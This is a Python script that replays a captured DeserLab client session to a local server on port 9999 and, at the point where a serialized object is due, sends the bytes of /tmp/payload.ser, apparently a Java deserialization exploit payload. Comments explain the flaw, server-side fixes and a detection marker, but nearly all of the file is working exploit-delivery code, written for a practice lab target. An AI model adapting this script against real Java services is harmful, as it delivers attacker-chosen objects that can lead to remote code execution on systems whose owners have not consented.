import socket
import binascii
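# Replays the client half of a DeserLab session, reconstructed from a packet
# capture of a real client/server exchange, and swaps the serialized data the
# client would normally send for the contents of a local file.
#
# Defensive context: a server that runs Java native deserialization on bytes
# from an untrusted peer lets that peer choose which classes are instantiated.
# The durable fixes are server-side: do not deserialize untrusted streams, or
# constrain them with an allow-list filter (java.io.ObjectInputFilter /
# jdk.serialFilter). On the wire, a stream that starts with AC ED 00 05 is a
# reliable marker of Java serialization traffic for detection rules.

# Binary mode: the file holds raw serialized bytes, so newline translation or
# text decoding must never touch it.
with open("/tmp/payload.ser", "rb") as f:
    payload = f.read()

s = socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
try:
    s.connect(("127.0.0.1", 9999))
    # Replies are read and discarded throughout; the script only needs the
    # server to advance through the exchange, it does not validate responses.
    s.recv(1024)
    print("connect")

    # Java serialization stream header: STREAM_MAGIC 0xACED, STREAM_VERSION 5.
    stream_header = b"\xac\xed\x00\x05"
    s.sendall(stream_header)
    s.recv(1024)
    print("header")
    s.recv(1024)

    # 0x77 is TC_BLOCKDATA followed by a one-byte length (4 here).
    # NOTE(review): the four data bytes are copied from the capture and are
    # application-specific; presumably a protocol hello value, confirm.
    s.sendall(b"\x77\x04")
    s.sendall(b"\xf0\x00\xba\xaa")
    s.recv(1024)
    print("2")
    s.recv(1024)

    # Two-byte block-data record, also replayed verbatim from the capture.
    # NOTE(review): presumably a version field, confirm against the capture.
    s.sendall(b"\x77\x02")
    s.sendall(b"\x01\x01")
    print("name")

    # Four-byte block-data record for the "name" step.
    # NOTE(review): 00 02 78 75 looks like a 2-byte length prefix followed by
    # the two characters "xu"; confirm against the capture.
    s.sendall(b"\x77\x04")
    s.sendall(binascii.a2b_hex("00027875"))

    # This replaces the part of the captured exchange that begins 73 72 ....
    # The first four bytes of the file are skipped.
    # NOTE(review): presumably those are the file's own AC ED 00 05 stream
    # header, which was already sent above; confirm for the file in use.
    s.sendall(payload[4:])
finally:
    # Release the socket even when a step above raises.
    s.close()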